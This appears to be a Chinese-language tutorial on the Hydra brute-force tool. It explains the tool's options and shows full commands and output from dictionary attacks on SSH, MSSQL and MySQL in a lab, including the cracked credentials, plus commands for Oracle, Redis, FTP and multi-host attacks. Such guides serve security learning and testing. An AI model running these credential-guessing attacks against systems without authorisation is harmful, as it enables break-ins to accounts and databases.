暴力破解工具hydra
文章仅供学习。用于其他用途而产生不良后果,作者不承担任何法律责任!
官方网站
https://www.thc.org/
使用参数
hydra [[[-l LOGIN|-L FILE] [-p PASS|-PFILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]][-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
导入字典
┌──(root💀kali)-[~/桌面]
└─# ls
pass.txt user.txt #user为账号字典 pass为密码字典
ssh示例
┌──(root💀kali)-[~/桌面]
└─# hydra -L user.txt -P pass.txt ssh://10.238.91.126 -v
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-26 11:19:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 7
[DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries (l:1/p:7), ~1 try per task
[DATA] attacking ssh://10.238.91.126:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@10.238.91.126:22
[INFO] Successful, password authentication is supported by ssh://10.238.91.126:22
[22][ssh] host: 10.238.91.126 login: root password: 111111
[STATUS] attack finished for 10.238.91.126 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-26 11:19:58
密码已经在开头为端口号的行显示出来了
[22][ssh] host: 10.238.91.126 login: root password: 111111
mssql示例
┌──(root💀kali)-[~/桌面]
└─# hydra -L user.txt -P pass.txt mssql://10.238.91.132 -v -t 10
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-26 11:25:26
[DATA] max 10 tasks per 1 server, overall 10 tasks, 42 login tries (l:6/p:7), ~5 tries per task
[DATA] attacking mssql://10.238.91.132:1433/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[1433][mssql] host: 10.238.91.132 login: sa password: 123456
[STATUS] attack finished for 10.238.91.132 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-26 11:25:30
[1433][mssql] host: 10.238.91.132 login: sa password: 123456
MySQL示例
┌──(root💀kali)-[~/桌面]
└─# hydra -L user.txt -P pass.txt mysql://10.238.91.132 -v -t 10
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-26 11:26:36
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 42 login tries (l:6/p:7), ~11 tries per task
[DATA] attacking mysql://10.238.91.132:3306/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[3306][mysql] host: 10.238.91.132 login: root password: I8k!R3p(#e
[STATUS] attack finished for 10.238.91.132 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-26 11:26:40
[3306][mysql] host: 10.238.91.132 login: root password: I8k!R3p(#e
以下服务没有本地环境因此没有具体示例。命令如下
oracle
hydra -P pass.txt oracle://192.168.0.129 -f –v
redis
hydra -P pass.txt -e nsr -t 16 192.168.0.101 redis
ftp
hydra -L user.txt -P pass.txt ftp://192.168.1.0 -f -V
多个ip进行穷举
增加 -M 跟ip列表,以MySQL为例。
hydra -L user.txt -P pass.txt -M ip.txt -V -o /root/crack mysql -t 16